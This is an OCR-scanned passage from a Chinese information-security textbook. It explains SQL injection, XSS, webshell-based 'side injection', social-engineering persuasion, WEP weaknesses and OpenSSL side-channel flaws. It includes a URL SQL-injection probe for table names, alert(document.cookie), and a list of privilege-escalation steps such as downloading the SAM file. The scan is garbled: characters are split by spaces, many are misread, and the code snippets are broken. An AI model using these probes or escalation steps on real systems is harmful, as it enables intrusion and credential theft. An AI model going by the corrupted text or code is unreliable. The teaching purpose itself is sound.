admin, adminuser, systemuser, systemusers, sysuser, sysusers, sysaccounts, systemaccounts 
等 。 并 通过 语句 进行 判断 HT TP://xxx.xxx.xxx/abe.asp?p=YYand (selectcount ( * ) 
fromTestDB.dbo. 表 名 ) >0 若 表 名 存在 ， 则 abc.asp 工作 正常 ， 否 则 异常 。 如 此 循环 ， 直 
到 狂 到 系统 账号 表 的 名 称 。 

6. 得 到 系统 的 管理 员 权 限 

ASP 木马 只 有 USER 权限 , 要 想 获取 对 系统 的 完全 控制 , 还 要 有 系统 的 管理 员 权限 。 
提升 权限 的 方法 有 很 多 种 : 上 传 木马 ， 修 改 开机 自动 运行 的 .ini 文件 ， 复 制 CMD.exe 到 
scripts， 人 为 制造 UNICODE 漏洞 ， 下 载 SAM 文件 ， 破 解 并 获取 OS 的 所 有 用 户 名 密码 
等 等 ， 视 系统 的 具体 情况 而 定 ， 可 以 采取 不 同 的 方法 。 

针对 上 述 的 SQL 注入 攻击 ， 可 以 使 用 下 面 的 方法 进行 防御 : 

© FR SQL 通用 防 注 入 系统 的 程序 ， 在 需要 防范 注入 的 页 面 头 部 用 
<!--#includefile=“xxx.asp ”--> 来 防止 攻击 者 进行 手动 注入 测试 。 可 是 攻击 者 通过 SQL 
注入 分 析 器 就 可 轻松 跳 过 防 注入 系统 并 自动 分 析 其 注入 点 ， 然 后 只 需 儿 秒 钟 ， 管 理 员 账 
号 及 密码 就 会 被 分 析出 来 。 

© 对 于 注入 分 析 器 的 防范 ， 首 先 要 知道 SQL 注入 分 析 器 是 如 何 工 作 的 。 如 果 分 析 
器 并 不 是 针对 admin 管理 员 账 号 ,而 是 针对 权限 (如 flag=1)， 那 么 无 论 管理 员 账 号 怎么 

@ 既然 无 法 逃 过 检测 ， 那 可 以 建立 两 个 账号 ， 一 个 是 普通 的 管理 员 账 号 ， 一 个 是 
防 注入 的 账号 。 利 用 一 个 权限 最 大 的 账号 制造 假象 ， 吸 引 软 件 的 检测 ， 而 这 个 账号 里 的 
内 容 是 大 于 千 字 以 上 的 中 文字 符 ， 就 会 迫使 软件 对 这 个 账号 进行 分 析 的 时 候 进入 全 负荷 
状态 甚至 资源 耗 尽 而 死机 。 下 面 进行 数据 库 的 修改 。 

。 对 表 结 构 进 行 修改 。 将 防 注 入 账号 字段 的 数据 类 型 进行 修改 ， 文 本 型 改 成 最 大 字 

段 255， 密 码 的 字段 也 进行 相同 的 设置 。 
。 对 表 进 行 修改 。 设 置 防 注入 账号 在 ID1， 并 输入 大 量 中 文字 符 。 
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。 把 真正 的 管理 员 密 码 放 在 ID2 后 的 任何 一 个 位 置 。 

完成 三 步 对 数据 库 的 修改 后 ， 还 需要 限制 管理 员 登 录 的 页 面 文 件 中 写 入 字符 ， 如 此 
即使 攻击 者 破解 密码 也 无 法 登录 ， 而 真正 的 密码 则 可 以 不 受 限制 。 
3.3.9.2 Bua 

跨 站 攻击 〈CrossSiteScriptExecution，XSS) 是 指 攻击 者 利用 网 站 程序 对 用 户 输入 过 
滤 不 足 , 输入 可 以 显示 在 页 面 上 对 其 他 用 户 造成 影响 的 HIML 代码 , 从 而 盗 取 用 户 资料 、 
利用 用 户 身 份 进行 某 种 动作 或 者 对 访问 者 进行 病毒 侵害 的 一 种 攻击 方式 。 
业界 对 跨 站 攻击 的 定义 如 下 : 跨 站 攻击 是 指 入 侵 者 在 远程 WEB 页 面 的 HTML 代码 
中 插入 具有 恶意 目的 的 数据 ， 用 户 认为 该 页 面 是 可 信赖 的 ， 但 是 当 浏 览 器 下 载 该 页 面 ， 
嵌入 其 中 的 脚本 将 被 解释 执行 。 由 于 HTML 语言 允许 使 用 脚本 进行 简单 交互 ， 入 侵 者 便 
通过 技术 手段 在 某 个 页 面 里 插入 一 个 恶意 HTML 代码 ， 例 如 记录 论坛 保存 的 用 户 信息 
(Cookie), HF Cookie 保存 了 完整 的 用 户 名 和 密码 资料 ， 用 户 就 会 遭受 安全 损失 。 如 这 
句 简单 的 Java 脚本 就 能 轻易 获取 用 户 信息 : alert (document.cookie)， 它 会 弹出 一 个 包含 
用 户 信息 的 消息 框 。 入 侵 者 运用 脚本 就 能 把 用 户 信息 发 送 到 他 们 自己 的 记录 页 面 中 ， 稍 
做 分 析 便 获 取 了 用 户 的 敏感 信息 。 

1， 跨 站 攻击 的 方式 

© 由 于 HTML 语言 允许 使 用 脚本 进行 简单 交互 ， 入 侵 者 便 通 过 技术 手段 在 某 个 页 
面 里 插入 一 个 恶意 HTML 代码 一 一 例如 记录 论坛 保存 的 用 户 信息 (Cookie), 由 于 Cookie 
保存 了 完整 的 用 户 名 和 密码 资料 ， 用 户 就 会 遭受 安全 损失 。 

@ XST (CrossSiteTracing) 攻击 描述 : 攻击 者 将 恶意 代码 嵌入 一 台 已 经 被 控制 的 主 
机 上 的 Web 文件 , 当 访问 者 浏览 时 恶意 代码 在 浏览 器 中 执行 , 然后 访问 者 的 cookie, http 
基本 验证 以 及 HTML 验证 信息 将 被 发 送 到 已 经 被 控制 的 主机 ， 同 时 传送 Trace 请 求 给 日 
标 主 机 ， 导 致 cookie 欺骗 或 者 是 中 间 人 攻击 。 

2. XSS 和 脚本 注入 的 区 别 

并 非 任何 可 利用 脚本 插入 实现 攻击 的 漏洞 都 被 称 为 XSS, 因为 还 有 另 一 种 攻击 方式 : 
“Injection”， 即 脚本 注入 ， 它 们 之 间 是 有 区 别 的 ， 主 要 在 于 CInjection) 脚本 插入 攻击 会 
把 插入 的 脚本 保存 在 被 修改 的 远程 Web 页 面 里 ， 如 : sqlinjection，XPathinjection。 跨 站 
脚本 是 临时 的 ， 执 行 后 就 消失 了 。 可 以 被 插入 远程 页 面 的 主流 脚本 包括 以 下 几 种 : 

e HTML 

e Java 

e VB 

e ActiveX 

e Flash 

3， 跨 站 攻击 的 防范 

跨 站 攻击 的 防范 需要 多 方面 协同 设置 ， 主 要 可 以 从 下 面 儿 个 方面 入 手 : 


第 3 章 网 络 安全 基础 


O 服务 器 设置 ， 包 括 硬盘 权限 、 组 件 安全 、IHS 用 户 、 服 务 器 安全 和 性 能 、 本 地 安 
全 策略 和 系统 服务 的 设置 。 

@ 禁用 Guests 组 用 户 调用 cmd.exe. 
3.3.9.3 ” 旁 注 攻击 

1， 旁 注 攻击 的 原理 

旁 注 是 最 近 网 络 上 比较 流行 的 一 种 入 侵 方 法 ， 在 字面 上 解释 就 是 “从 旁 注入 ”， 利 
用 同一 主机 上 面 的 不 同 网 站 漏洞 得 到 webshell， 从 而 通过 主机 上 的 程序 或 者 服务 所 暴露 
的 用 户 所 在 物理 路 径 进行 入 侵 。 众 所 周知， 黑客 要 想 入 侵 某 网 站 ,首先 都 会 进入 其 网 站 ， 
来 查看 检测 其 是 否 存在 脚本 注入 的 漏洞 。 如 果 没 有 发 现任 何 可 利用 价值 后 ， 入 侵 者 就 会 
想到 旁 注 攻 击 ， 他 会 查看 服务 器 上 其 他 的 网 站 ， 是 否 存在 安全 漏洞 ， 然 后 在 利用 有 漏洞 
的 网 站 进行 入 侵 , 获取 Webshell 甚至 是 整个 服务 器 的 控制 权 , 从 而 服务 器 上 的 网 站 安全 ， 
也 就 不 攻 自 破 了 。 

简单 来 说 ，webshell 就 是 一 个 asp 或 php 木马 后 门 ， 入 侵 者 在 入 侵 了 一 个 网 站 后 ， 
常常 在 将 这 些 asp 或 php 木马 后 门 文件 放置 在 网 站 服务 器 的 web 目录 中 ， 与 正常 的 网 页 
文件 混在 一 起 。 然 后 入 侵 者 就 可 以 用 web 的 方式 ， 通 过 asp 或 php 木马 后 门 控制 网 站 服 
务 器 ， 包 括 上 传 下 载 文件 、 查 看 数据 库 、 执 行 任意 程序 命令 等 。 

2. 旁 注 攻 击 的 抵御 方法 

通常 ， 对 于 旁 注 攻击 ， 有 两 种 抵御 方法 : 

外 设置 HS 单 用 户 权 限 / 禁 止 ， 来 阻止 非法 用 户 运 行 任意 的 CMD 命令 ， 从 而 使 入 侵 
者 的 旁 注 入 侵 在 无 法 提升 权限 下 导致 失败 。 

@ 利 用 端口 转发 技术 。 要 抵御 旁 注 攻击 ， 首 先 要 阻止 入 侵 者 得 知 服务 器 的 OP 地 址 ， 
其 架设 在 主机 上 的 网 站 ， 才 能 有 安全 上 的 保障 。 为 了 迷惑 whois 查询 ， 可 以 将 自己 服务 
ASTI IP 地 址 进行 隐藏 。 


3.3.10 ”社会 工程 


总 体 上 来 说 ， 社 会 工程 学 就 是 使 人 们 顺从 你 的 意愿 、 满 足 你 的 欲望 的 一 门 艺 术 与 学 
问 。 它 并 不 单纯 是 一 种 控制 意志 的 途径 ， 但 它 不 能 帮助 你 掌握 人 们 在 非 正常 意识 以 外 的 
行为 ， 且 学 习 与 运用 这 门 学 问 一 点 也 不 容易 。 它 同样 也 蕴涵 了 各 式 各 样 的 灵活 的 构思 与 
变化 着 的 因素 。 无 论 任何 时 候 ， 在 需要 套 取 到 所 需要 的 信息 之 前 ， 社 会 工程 学 的 实施 者 
都 必须 : 掌握 大 量 的 相关 知识 基础 、 花 时 间 去 从 事 资料 的 收集 与 进行 必要 的 如 交谈 性 质 
的 沟通 行为 。 与 以 往 的 入 侵 行 为 相 类 似 ， 社 会 工程 学 在 实施 以 前 都 是 要 完成 很 多 相关 的 
准备 工作 的 ， 这 些 工 作 甚 至 要 比 其 本 身 还 要 更 为 繁重 。 
3.3.10.1 方法 

试图 驱使 某 人 遵循 你 的 意愿 去 完成 你 想 要 完成 的 任务 是 可 以 有 很 多 种 方法 的 。 

第 一 种 方法 也 是 最 简单 明了 的 方法 ， 就 是 目标 个 体 被 问 到 要 完成 你 的 目的 时 给 予 其 


eo DB 


2cx 医 


信息 安全 工程 师 教程 


一 个 直接 的 “指引 ”。 毫 无 疑问 这 是 最 容易 成 功 的 , 也 是 最 简单 与 最 直观 的 方法 了 。 当然， 
被 指引 的 个 体 也 会 清楚 地 知道 你 想 他 们 干 些 什么 。 

第 二 种 就 是 为 某 个 个 体 度 身 订 造 一 个 人 为 的 (注释 : 通过 伪造 的 手段 ) 特定 情形 / 
环境 。 这 种 方法 比 你 仅仅 需要 考虑 到 了 某 个 个 体 的 相关 信息 状况 附带 更 多 的 因素 ， 例 如 
如 何 说 服 你 的 对 象 ， 你 可 以 设 定 〈 注 释 : 刻意 安排 ) 某 个 理由 /动机 去 迫使 其 为 你 完成 某 
个 非 其 本 身 意愿 的 行为 结果 。 这 包括 了 远 至 于 为 某 个 特定 的 个 体 创造 一 个 有 说 服 力 的 企 
图 而 进行 的 工作 , 与 大 量 你 想得到 的 目标 的 相关 知识 。 这 意味 着 那些 特定 的 情况 /环境 必 
须 建立 在 客观 事实 的 基础 上 。 少 量 的 谎言 会 使 效果 更 好 一 些 。 
3.3.10.2 关联 

不 管 怎么 说 ， 社 会 工程 学 运用 是 否 能 成 功 也 有 取决 于 目标 个 体 与 你 的 目的 有 多 大 关 
联 的 因素 的 。 可 以 说 系统 管理 员 、 计 算 机 安全 执行 官 、 技 术 研究 人 员 、 那 些 依靠 计算 机 / 
网 络 进行 工作 又 或 者 通过 其 进行 通信 的 人 与 大 多 数 黑客 使 用 社会 工程 学 进行 攻击 的 目标 
都 是 有 莫大 的 关联 的 。 

有 高 度 关联 性 的 个 体 大 多 会 被 强 而 有 利 的 论据 所 说 服 。 事 实 上 可 以 给 予 更 多 强 而 有 
利 的 论据 来 支持 你 的 观点 。 当 然 ， 那 些 观 点 也 有 薄弱 的 一 面 。 是 否 将 论点 薄弱 的 一 面 展 
现 给 有 高 度 关 联 的 人 知道 将 极 大 可 能 地 决定 你 是 否 能 说 服 对 方 。 当 某 人 有 可 能 直接 被 社 
会 工程 学 攻击 所 影响 , 若 此 时 出 现 薄 弱 的 论据 将 有 可 能 会 导致 其 思想 上 产生 相反 的 意识 。 
所 以 面 对 与 你 的 目的 有 关联 的 人 时 你 必须 给 予 强 而 有 力 的 论据 ， 而 避免 出 现 理 由 薄弱 的 
论据 。 

相对 于 对 想得到 的 结果 并 不 感 兴趣 的 人 ， 你 可 以 把 他 们 列 入 低 关联 的 人 这 个 类 别 中 
去 。 相 关 的 例子 如 : 一 个 网 络 系统 机 构 中 的 保安 人 员 、 清 洁 工 人 、 又 或 者 是 前 台 接待 小 
姐 等 。 因 为 低 关 联 类 别 的 个 体 并 不 会 直接 对 你 的 目的 /结果 造成 影响 ， 而 且 他 们 往往 不 会 
去 分 析 用 来 说 服 的 论点 的 双 面 性 问题 。 他 们 的 决策 往往 会 遵循 你 的 意愿 又 或 者 是 完全 不 
受 其 他 的 “意识 ”所 影响 。 这 些 的 “意识 ”如 : 社会 工程 学 所 提供 的 理由 、 表 面 形势 上 
的 迫 急 性 又 或 者 是 在 某 人 强烈 的 说 服 下 。 任 经 验 而 论 ， 在 这 样 的 情况 下 只 能 尽 可 能 地 给 
予 其 更 多 的 论据 与 理由 了 ， 估 计 这 样 的 效果 会 更 好 一 些 。 基 本 上 ， 对 于 那些 与 你 的 意识 
不 一 致 的 人 ， 试 图 用 大 量 的 论据 和 指引 去 说 服 他 们 更 胜 于 他 们 与 你 的 目的 的 关联 程度 。 

有 一 点 是 需要 注意 的 : 在 进行 某 些 工作 的 时 候 ， 能 力 低 的 个 体 更 多 会 去 仿效 能 力 高 
的 个 体 的 行为 模式 ,在 计算 机 系统 管理 方面 ,“ 能 力 低 的 个 体 ” 大 多 是 指 上 文 所 提 到 的 “ 低 
关联 的 人 ”。 从 上 述 的 观点 考虑 , 不 要 试图 对 系统 管理 员 这 类 别 的 个 体 进行 社会 工程 学 攻 
击 ， 除 非 其 能 力 不 及 你 ， 不 过 这 样 的 可 能 性 非常 的 低 。 


3.3.11 部 分 协议 的 安全 漏洞 


3.3.11.1 WEP 安全 漏洞 
WEP 是 WiredEquivalentPrivacy 的 简称 ， 有 线 等 效 保密 (WEP) 协议 是 对 在 两 台 设 
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备 间 无 线 传输 的 数据 进行 加 密 的 方式 ， 用 以 防止 非法 用 户 窃 听 或 侵入 无 线 网 络 。 

随 着 无 线 局 域 网 带 给 人 们 快捷 和 便利 ， 其 应 用 越 来 越 普及 。 但 由 于 无 线 信道 的 开放 
性 和 共享 性 , 无 线 数据 流 的 安全 问题 就 显得 尤为 突出 。 无 线 局 域 网 的 TEEE802.11 标准 通 
过 定义 了 两 种 认证 方式 ( 即 开放 系统 认证 和 共享 密 钥 认证 ) 以 及 运用 RC4 流 加 密 算 法 的 
WEP (WiredEquivalentPrivacey， 有 线 等 效 加 密 ) 协议 来 加 强 其 安全 性 。 然 而 ， 事实 表明 ， 
WEP 协议 并 没有 达到 人 们 期 望 的 安全 水 平 。 相 反 ，WEP 本 身 也 存在 致命 的 安全 漏洞 ， 
这 为 各 种 复 改 数据 的 主动 攻击 和 窃听 数据 的 被 动 攻击 行为 提供 了 方便 。 

和 许多 新 技术 一 样 ， 最 初 设计 的 WEP 被 人 们 发 现 了 许多 严重 的 弱点 ， 在 过 去 的 一 
年 里 ， 专 家 们 利用 已 经 发 现 的 弱点 来 试 着 攻击 WEP， 结 果 攻破 了 WEP 声称 具有 的 所 有 
安全 控制 功能 : 网 络 访问 控制 、 数 据 机 密 性 保护 和 数据 完整 性 保护 。 

1. 加 密 算法 中 存在 的 漏洞 

WEP 采用 RC4 加 密 算 法 ， 其 特点 是 提供 了 一 定 的 安全 性 能 、 自 同步 且 易于 用 软 硬 
件 实现 ， 但 也 存在 一 定 的 问题 。 首 先 ， 作 为 流 加 密 算 法 ， 如 果 在 接收 时 丢失 了 一 个 比特 ， 
则 后 续 数据 解密 后 全 部 错误 ， 整 个 包 必 须 丢弃 。 因 此 WEP 算法 在 每 发 送 一 个 新 数据 包 
时 必须 重新 初始 化 和 选择 初始 化 向 量 IV。 其 次 ，RC4 算法 具有 以 下 特点 : 假设 C1、C2 
为 密 文 ，P1、P2 为 明文 ，key 为 密 钥 ， 则 : 

C1=P1 ®RC4 (key) 
C2=P2® RC4 (key) 
C1 ® C2=P1 ® P2 

所 以 在 密 钥 相 同 的 情况 下 ， 如 果 知 道 P1， 则 可 以 得 到 P2， 如 果 偷 听 者 有 足够 的 明 
文 ， 则 他 就 可 以 通过 “字典 ”攻击 法 解密 得 到 几乎 全 部 数据 。802.11 使 用 了 24 比特 的 
TV 来 保证 每 个 数据 包 都 使 用 不 同 的 密 钥 ， 但 在 标准 802.11 网 络 中 ， 单 独 一 个 运行 在 
11Mbps 上 的 基站 可 以 在 一 个 小 时 之 内 把 整个 密 钥 空间 给 消耗 光 , 一 个 拥有 多 个 基站 的 更 
大 网 络 会 以 一 个 更 快 的 速度 把 密 钥 空间 给 消耗 光 。 这 样 就 出 现 了 初始 化 向 量 重用 的 现象 ， 
导致 C1@ C2 使 用 的 RC4 算法 性 能 下 降 ， 变 的 容易 被 别人 攻击 。 当 前 大 多 数 部 署 的 无 线 
局 域 网 都 是 利用 802.11 作为 TCP/IP 网 络 的 数据 链 路 层 的 ， 每 一 个 传输 分 组 都 包含 一 个 
含有 大 量 已 知 明文 信息 的 数据 报 ， 每 一 个 数据 报 呈 现 出 来 的 信息 都 可 以 让 黑客 还 原 出 针 
对 每 一 个 传输 帧 的 部 分 密 钥 流 。 经 过 时 间 积 累 ， 黑 客 可 以 导出 更 进一步 的 分 组 信息 ， 并 
且 在 获得 了 足够 多 的 信息 之 后 ， 黑 客 就 可 以 利用 RC4 加 密 算法 计算 出 原始 的 种 子 信息 。 
必须 注意 的 一 点 是 ， 利 用 TCP 数据 报 推理 和 重复 的 IV 分 组 可 以 极 大 地 减少 破解 明文 信 
息 和 密 钥 所 花 的 时 间 。 

2. 密 钥 管理 中 存在 的 漏洞 

在 WEP 机 制 中 ， 对 密 钥 的 生成 与 分 布 没有 任何 的 规定 ， 对 密 钥 的 使 用 也 没有 明确 
的 规定 ， 密 钥 的 使 用 情况 比较 混乱 。 

数据 加 密使 用 的 基 密 钥 主 要 有 两 种 ，defaultkey 和 key-mappingkeys。defaultkey 是 配 
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置 中 缺 省 设 定 的 ， 共 有 四 个 ， 用 keyID 来 标志 ， 分 别 为 0，1，2，3。key-mappingkeys 
是 针对 不 同 的 发 送 方 和 接收 方 所 对 应 的 唯一 密 钥 ， 发 送 方 在 发 送信 息 的 时 候 ， 采 用 发 送 
方 与 接收 方 所 共同 持 有 的 密 钥 加 密 。 为 了 实现 这 种 密 钥 , 每 个 系统 必须 维持 一 张 密 钥 表 。 
在 表 中 ， 保 持 了 通信 双方 以 及 他 们 所 使 用 的 key-mappingkeys 记录 。 在 每 次 通信 时 ， 首 
先 从 表 中 查找 ， 是 否 存 在 自己 与 通信 用 户 所 共享 的 密 钥 ， 如 果 存 在 ， 即 可 用 于 信息 的 加 
解密 。 和 否则 ， 则 使 用 defaultkey， 并 用 keyID 来 选择 。 也 就 是 说 ， 在 数据 帧 加 密 时 对 于 
key-mappingkeys 的 选择 优 于 其 他 任何 密 钥 。 

在 两 种 密 钥 中 , key-mappingkeys 的 使 用 更 为 安全 ,但 实际 上 人 们 很 少 实现 这 种 密 钥 。 
一 是 因为 随 着 网 络 规模 的 扩大 ， 用 于 存储 密 钥 的 空间 就 会 越 来 越 大 ， 另 一 方面 ， 这 种 密 
钥 需 要 使 用 其 他 的 方法 来 传送 ， 实 现 起 来 比较 困难 。 此 外 由 于 用 户 的 人 为 因素 ， 实 际 上 
人 们 使 用 的 主要 是 keyID 为 0 的 defaultkey。 

从 上 面 的 分 析 可 知 ， 大 多 数 用 户 使 用 keyID 为 0 的 defaultkey。 这 样 ， 首 先 就 增加 了 
用 户 站 点 之 间 密 钥 重 用 的 可 能 性 ， 而 WEP 机 制 中 对 于 密 钥 的 重用 没有 任何 限制 ， 其 次 
密 钥 是 采用 手工 装载 ， 一 旦 装 入 ， 就 很 少 更 新 ; 最 后 ， 由 于 使 用 WEP 机 制 的 设备 都 是 
将 密 钥 保存 在 设备 中 ， 因 此 倘若 设备 丢失 ， 就 可 能 为 攻击 者 所 使 用 。 

3. 身份 认证 机 制 中 存在 的 漏洞 

基于 WEP 机 制 的 身份 认证 主要 存在 以 下 三 方面 的 问题 : 首先 ，WEP 机 制 中 使 用 的 
身份 认证 是 基于 硬件 的 认证 模式 ， 身 份 认证 所 使 用 的 密 钥 是 存储 在 硬件 中 ， 没 有 任何 辅 
助 软件 使 认证 机 制 进一步 完善 。 只 要 拥有 该 硬件 设备 ， 无 论 是 合法 用 户 还 是 网 络 攻击 者 
都 可 以 认证 成 功 并 进入 网 络 。 也 就 是 说 ， 如 果 硬 件 落 入 攻击 者 手 里 ， 攻 击 者 就 可 以 用 它 
成 功 登入 网 络 ， 这 就 是 所 谓 的 硬件 威胁 。 其 次 ， 在 身份 认证 的 过 程 中 ， 接 入 点 发 送 给 用 
户 站 点 的 ChallengeText 是 明文 发 送 的 ， 而 在 接 下 来 的 步骤 中 ， 用 户 站 点 向 接 入 点 发 送 
ChallengeText 的 密 文 。 如 果 攻 击 者 获得 了 ChallengeText 的 明文 与 密 文 ， 则 他 可 以 恢复 出 
该 密 钥 流 序列 ， 并 使 用 该 密 钥 流 序列 进行 身份 认证 。 最 后 ，WEP 中 使 用 以 共享 密 钥 为 基 
础 的 身份 认证 只 是 从 用 户 站 点 到 接 入 点 的 认证 ， 也 就 是 说 ， 只 有 用 户 站 点 在 进入 网 络 时 
需要 向 接 入 点 认证 自己 的 身份 ， 而 接 入 点 无 需 向 用 户 站 点 认证 自己 的 身份 。 这 就 造成 一 
种 安全 隐患 ， 因 为 攻击 者 可 以 伪装 成 接 入 点 ， 拒 绝 来 自用 户 站 点 的 合理 要 求 ， 这 就 是 所 
谓 的 拒绝 服务 攻击 。 
3.3.11.2 OpenSSL 安全 漏洞 

在 互联 网 安全 越 来 越 受到 社会 重视 以 及 人 们 越 来 越 关注 自身 私密 信息 安全 性 的 情 
况 下 ， 作 为 保障 互联 网 数据 安全 、 满 足 人 们 对 安全 性 需求 的 基础 ，OpenSSL 
(OpenSecureSocketsLayer) 本 身 的 安全 性 问题 日 益 突出 ， 所 面临 的 安全 威胁 也 与 日 俱 增 。 
长 期 以 来 ，OpenSSL 开发 维护 所 需 的 人 员 和 资金 一 直 短缺 ， 造 成 OpenSSL 更 新 缓慢 ， 
各 种 密码 算法 、 协 议 存在 的 结构 缺陷 和 编码 实现 上 的 技术 漏洞 ， 不 能 及 时 修补 更 新 ， 另 
外 ， 研 究 人 员 往 往 更 倾向 于 研究 SSL/ (D) TLS (TransportLayerSecurityProtocol) 协议 
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和 密码 算法 的 安全 性 而 忽略 了 作为 具体 实施 的 OpenSSL 的 安全 威胁 和 防御 措施 。 然 而 ， 
OpenSSL 一 旦 遭受 到 攻击 将 会 导致 直接 的 、 甚 至 是 毁灭 性 的 后 果 。 

1. 计时 攻击 缺陷 

在 针对 对 称 加 密 算法 和 非 对 称 加 密 算法 计时 攻击 的 研究 中 ， 目 前 主要 是 结合 高 速 组 
冲 存储 器 Cache 的 行为 信息 作为 破解 密 钥 的 思想 。Cache 计时 攻击 的 本 质 是 密码 加 解密 
过 程 中 微 处 理 器 读 取 Cache 数据 时 会 发 生 Cache 命中 或 者 Cache 失效 从 而 导致 存在 时 间 
差异 ， 结 合算 法 设计 结构 推测 其 内 部 执行 过 程 ， 实 现 密 钥 破解 。 

对 称 加 密 算法 计时 攻击 缺陷 :对 称 加 密 算法 在 OpenSSL 密码 算法 库 执 行 查找 S 盒 不 
同 索引 时 存在 时 间 差 异 等 旁 路 信息 , 攻击 者 利用 该 缺陷 可 以 发 起 针对 OpenSSL 对 称 加 密 
算法 的 计时 攻击 。2003 年 ，Tsunoo 实现 针对 DES 加 密 算 法 的 计时 攻击 ， 成 功 破解 DES 
全 部 密 钥 。2005 年 ，D.JBernstein 公布 了 一 种 Cache 计时 攻击 法 ， 并 以 此 破解 了 一 个 装 
载 OpenSSLAES 加 密 系统 的 服务 器 。 需 要 指出 的 是 , AES 加 密 算法 本 身 设 计 并 没有 缺陷 ， 
问题 出 现在 OpenSSL 中 所 实现 的 AES 算法 上 , 即 设计 实现 具有 常量 执行 时 间 的 高 速 AES 
加 解密 软件 非常 困难 ,因为 在 CPU 运算 中 不 可 能 一 次 将 整个 加 密 密 钥 数 组 读 取 , 基于 此 
思想 ， 分 别针 对 OpenSSL 中 实现 的 Camellia 算法 和 RC4 算法 进行 了 成 功 的 Cache 计时 
攻击 。 

非 对 称 加 密 算法 计时 攻击 缺陷 : ERSA, DSA 等 非 对 称 加 密 算法 中 , 模 窜 运算 是 最 
为 重要 的 运算 之 一 ， 直接 涉 及 到 加 密 算法 的 安全 性 。 在 RSA 算法 中 , 模 宕 运算 的 寡 指 数 
即 为 其 私 钥 ， 而 在 DSA 算法 中 ， 通 过 知 指 数 则 可 间接 分 析出 其 私 钥 。 现 有 针对 RSA, 
DSA 等 算法 的 Cache 计时 攻击 , 其 本 质 上 是 利用 算法 执行 模 暴 运算 过 程 泄露 的 时 间 信 息 ， 
推测 暴 指 数 ， 结 合 密码 算法 结构 分 析 其 私 钥 。 在 OpenSSL 具体 实现 中 ，RSA、DSA $f 
法 在 解密 过 程 由 于 采用 的 Montgomery 算法 具有 时 间 关 联 性 等 缺陷 ， 因 此 ， 可 以 对 RSA 
算法 和 DSA 算法 在 解密 过 程 进行 Cache 计时 攻击 。 此 外 ,针对 安全 性 更 强 的 ECDSA 算 
法 在 OpenSSL 的 实现 上 也 证 明 存 在 Cache 计时 攻击 威胁 。 

2. 分 支 预 测 缺 陷 

现代 处 理 器 采用 分 支 预测 机 制 ， 即 在 分 支 指令 执行 结束 之 前 利用 预测 算法 猜测 哪 条 
分 支 将 会 被 运行 ， 以 提高 处 理 器 指令 流水 线 的 性 能 。 然 而 ， 利 用 采集 度量 分 支 被 正确 预 
测 和 错误 预测 时 不 同 的 执行 时 间 ， 就 可 以 分 析出 处 理 器 执行 了 哪 一 条 分 支 。 在 某 种 意义 
上 ， 分 支 预测 攻击 也 是 计时 攻击 的 一 种 。 

在 OpenSSL 中 ， 利 用 平方 乘 算法 和 扩展 欧 儿 里 德 算 法 (BinaryExtendedEuclidean 
Algorithm, BEEA) 实现 RSA 中 的 模 寡 运算 存在 “让 then-else” 分 支 运 算 缺 陷 ， 分 支 预 
测 分 析 ~CBranchPredictionAnalysis, BPA) 攻击 和 简单 分 支 预测 分 析 (SimpleBranch 
PredictionAnalysis, SBPA) 攻击 ， 正 是 在 RSA 算法 模 窜 运算 运行 时 ,利用 分 支 预 测 不 同 
的 执行 时 间 ， 来 分 析出 其 私 钥 。 
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3. 故障 分 析 缺 陷 

OpenSSL 在 针对 对 称 和 非 对 称 加 密 算法 的 具体 实现 上 存在 缺陷 , 易 遭 受 故障 分 析 攻 
击 威胁 。 故 障 分 析 攻 击 的 思想 最 早 由 Boneh 等 人 提出 ， 该 攻击 利用 密码 运算 过 程 中 的 错 
误 信 息 实施 攻击 。 之 后 ， 文 献 提出 应 用 于 对 称 密 钥 算法 的 差分 故障 分 析 ， 成 功 破解 DES 
算法 密 钥 。 最 近 ， 研 究 者 利用 差分 故障 分 析 又 分 别提 出 针对 AES 及 采用 中 国 剩余 定理 
(ChineseRemainderTheorem, CRT) 的 RSA 等 密码 算法 的 攻击 手段 以 及 相应 防御 策略 。 

此 外 ，BihamEli 等 人 提出 的 “BugAttacks” 实 际 上 也 是 故障 分 析 攻 击 的 一 种 ， 它 利 
用 计算 机 微 处 理 器 存在 除 运算 漏洞 , 即 解 密 密 文 时 产生 差错 而 导致 密 钥 信息 泄露 。 目前 ， 
大 部 分 密码 算法 都 已 被 证 明 易 遭受 故障 分 析 攻 击 。 

4. 单 / 双 字 节 偏差 缺陷 

由 于 对 CBC 加 密 模 型 的 攻击 越 来 越 严重 ， 因 此 ，RC4 算法 越 来 越 受 到 重视 以 及 应 
用 范围 逐渐 增多 。 目 前 ， 大 约 有 50% 多 的 TLS 协议 采用 RC4 算法 保护 数据 安全 ， 如 图 


3-45 所 示 。 
27.3% om 
m 终端 系统 不 支持 RC4 


m 终端 系统 支持 RC4 


浏览 器 使 用 RC4 


图 3-45 服务 器 和 客户 端 中 支持 使 用 RC4 所 占 比 例 


RC4 由 RSA 算法 设计 者 中 的 RonRivest 在 1987 年 设计 ， 因 其 运算 快 和 简单 性 ， 已 
经 成 为 使 用 最 为 广泛 的 流 加 密 算法 。 它 被 用 于 常用 安全 协议 中 ， 如 SSL/ D) TLS 协议 
等 。 然 而 ， 最 近 披 露出 OpenSSL 实现 的 RC4 流 加 密 算法 存在 安全 漏洞 ， 该 漏洞 允许 攻 
击 者 从 使 用 RC4 加 密 的 TLS 连接 中 恢复 有 限 数量 的 纯 文 本 内 容 。 因 为 该 加 密 算 法 生成 
的 密 钥 流 中 存在 统计 性 缺陷 ， 从 而 导致 泄露 部 分 加 密 信息 ， 为 攻击 者 提供 足够 的 样本 进 
行 攻击 分 析 。 

5. 伪 随 机 数 生成 器 缺陷 

随机 数 在 密码 学 中 起 着 关键 作用 ， 很 多 密码 算法 都 要 将 随机 数 作为 基础 参数 来 运 
用 ， 例 如 ， 直 接 以 随机 数 作为 公 钥 密码 算法 中 的 密 钥 ， 或 是 以 随机 数 来 产生 非 对 称 加 密 
算法 中 的 密 钥 或 对 称 加 密 算 法 中 的 会 话 密 钥 ; 在 密 钥 分 配 中 ， 使 用 随机 数 来 防止 重 放 攻 
击 等 。 

密码 应 用 大 多 使 用 算法 来 生成 随机 数 ， 这 些 算法 是 确定 的 ， 所 以 产生 的 序列 并 非 统 
计 随 机 的 ， 一 般 称 为 伪 随 机 数 ， 而 用 于 产生 伪 随 机 数 的 算法 称 为 伪 随 机 数 生成 器 
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(PRNG)。 随 着 伪 随 机 数 生成 器 在 密码 体系 中 的 重要 性 越 来 越 突显 ， 围 绕 它 所 产生 的 各 
